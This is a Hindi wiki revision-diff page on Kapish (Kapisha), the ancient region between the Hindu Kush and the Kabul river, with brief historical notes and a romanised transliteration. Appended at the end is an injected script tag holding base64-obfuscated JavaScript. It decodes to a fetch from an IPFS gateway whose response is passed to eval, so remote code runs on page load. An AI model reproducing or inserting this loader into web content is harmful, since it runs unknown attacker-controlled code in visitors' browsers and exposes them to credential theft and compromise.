Difference between revisions of "कपिश"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
*कपिश [[हिन्दूकुश पर्वत|हिंदूकुश पर्वत]] से काबुल नदी ([[अफ़ग़ानिस्तान]]) तक के प्रदेश का प्राचीन नाम है।  
 
*कपिश [[हिन्दूकुश पर्वत|हिंदूकुश पर्वत]] से काबुल नदी ([[अफ़ग़ानिस्तान]]) तक के प्रदेश का प्राचीन नाम है।  
 +
*कपिश को कपिशा भी कहा जाता है।
 
*[[युवानच्वांग]] के समय में (630-645 ई.) कपिश का विस्तृत राज्य था और इसके अधीन दस से अधिक रियासतें थीं जिनमें [[गंधार]] भी सम्मिलित था।  
 
*[[युवानच्वांग]] के समय में (630-645 ई.) कपिश का विस्तृत राज्य था और इसके अधीन दस से अधिक रियासतें थीं जिनमें [[गंधार]] भी सम्मिलित था।  
*कपिशा इस प्रदेश की राजधानी थी जहां [[कनिष्क]] ग्रीष्मकाल में रहा करता था।  
+
*कपिश इस प्रदेश की राजधानी थी जहां [[कनिष्क]] ग्रीष्मकाल में रहा करता था।  
*कपिशा का अभिधान बेग्राम (अफ़ग़ानिस्तान) नामक नगर से किया गया है।  
+
*कपिश का अभिधान बेग्राम (अफ़ग़ानिस्तान) नामक नगर से किया गया है।  
  
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Revision as of 12:13, 24 August 2011

  • kapish hiandookush parvat se kabul nadi (afaganistan) tak ke pradesh ka prachin nam hai.
  • kapish ko kapisha bhi kaha jata hai.
  • yuvanachvaang ke samay mean (630-645 ee.) kapish ka vistrit rajy tha aur isake adhin das se adhik riyasatean thian jinamean gandhar bhi sammilit tha.
  • kapish is pradesh ki rajadhani thi jahaan kanishk grishmakal mean raha karata tha.
  • kapish ka abhidhan begram (afaganistan) namak nagar se kiya gaya hai.


tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>